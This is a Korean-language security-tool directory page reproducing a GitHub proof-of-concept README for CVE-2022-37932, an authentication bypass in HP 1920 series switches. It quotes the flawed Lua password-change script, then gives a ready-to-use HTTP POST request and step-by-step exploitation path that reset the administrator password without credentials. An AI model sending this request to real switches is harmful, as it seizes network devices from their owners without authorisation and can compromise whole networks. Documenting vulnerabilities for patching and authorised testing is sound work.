Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-37932 — HP 1920 시리즈 스위치의 인증 우회에 대한 개념 증명 익스플로잇으로, 조작된 HTTP POST 요청을 통해 인증 없이 관리자 비밀번호를 변경할 수 있습니다. | Kitploit
도구/GitHubGitHub/tim-hoekstra/cve-2022-37932
IoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubtim-hoekstra/cve-2022-37932

CVE-2022-37932

HP 1920 시리즈 스위치의 인증 우회에 대한 개념 증명 익스플로잇으로, 조작된 HTTP POST 요청을 통해 인증 없이 관리자 비밀번호를 변경할 수 있습니다.

저장소 보기
211년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

HP 스위치 펌웨어 인증 우회 취약점

CVE-2022-37932

펌웨어 버전: PD.02.21
영향을 받는 장치: HP 1920 시리즈 스마트 관리형 스위치

개요

이 저장소는 펌웨어 버전 PD.02.21을 실행하는 HP 1920 시리즈 스마트 관리형 스위치의 중요한 인증 우회 취약점을 문서화합니다. 이 취약점을 통해 인증되지 않은 공격자가 사전 인증 없이 관리자 비밀번호를 변경할 수 있어 장치를 완전히 장악할 수 있습니다.

기술 세부 사항

취약점은 장치의 기본 비밀번호 변경을 처리하는 /login/default_password_cfg.lua 스크립트에 존재합니다. 이 스크립트는:

  1. 사용자 인증 여부를 확인하지 않고 양식 POST 요청을 수락합니다.
  2. oldPwd 매개변수가 기본 비밀번호(비어 있음)와 일치하는지만 확인합니다.
  3. POST 매개변수에 따라 사용자의 비밀번호를 직접 변경합니다.

취약한 코드

default_password_cfg.lua의 주요 취약 부분:

root@kitploit:~
if (request_method == 'POST') then
  -- No authentication or session checks!
  
  local defaultPassword = fpaux.string_const("FD_USER_MGR_DEFAULT_PASSWORD")
  -- ...

  if form_post.oldPwd ~= defaultPassword then
    errorStatus = "401 Unauthorized"
    errorText = label.old_password_mismatch
  else
    -- Proceeds to change password
    -- ...
  end
end

스크립트에 중요한 보안 제어 기능이 누락되었습니다:

  • 세션 검증 없음
  • CSRF 보호 없음
  • 속도 제한 없음
  • 인증 없이 비밀번호 변경 기능에 직접 접근

개념 증명

공격자는 간단한 HTTP POST 요청을 사용하여 이 취약점을 악용할 수 있습니다:

root@kitploit:~
POST /login/default_password_cfg.lua HTTP/1.1
Host: [target-ip]
Content-Type: application/x-www-form-urlencoded
Content-Length: [length]

username=admin&oldPwd=&newPwd=[new-password]&confirmPwd=[new-password]

참고: 기본 비밀번호가 비어 있으므로 oldPwd 매개변수는 비워 둡니다.

영향

이 취약점을 통해 인증되지 않은 공격자는 다음을 수행할 수 있습니다:

  1. 자격 증명을 알 필요 없이 관리자 비밀번호 변경
  2. 장치에 대한 완전한 관리 제어권 획득
  3. 스위치 구성, 네트워크 설정 변경, 잠재적으로 전체 네트워크 손상

악용 경로

  1. 네트워크에서 취약한 HP 1920 시리즈 스위치 찾기
  2. 조작된 HTTP POST 요청을 장치에 직접 전송
  3. 관리자 비밀번호가 공격자가 제어하는 값으로 변경됨
  4. 공격자는 이제 새 비밀번호와 전체 관리자 권한으로 로그인 가능

크레딧

원래 이 취약점을 발견한 사람을 조사할 시간이 없었습니다. 단지 개념 증명을 게시하는 것입니다.

법적 고지

이 정보는 교육 목적으로만 제공됩니다. 작성자는 이 정보의 오용에 대해 책임을 지지 않습니다. 취약점을 테스트하기 전에 항상 적절한 승인을 받으십시오.

도구 다운로드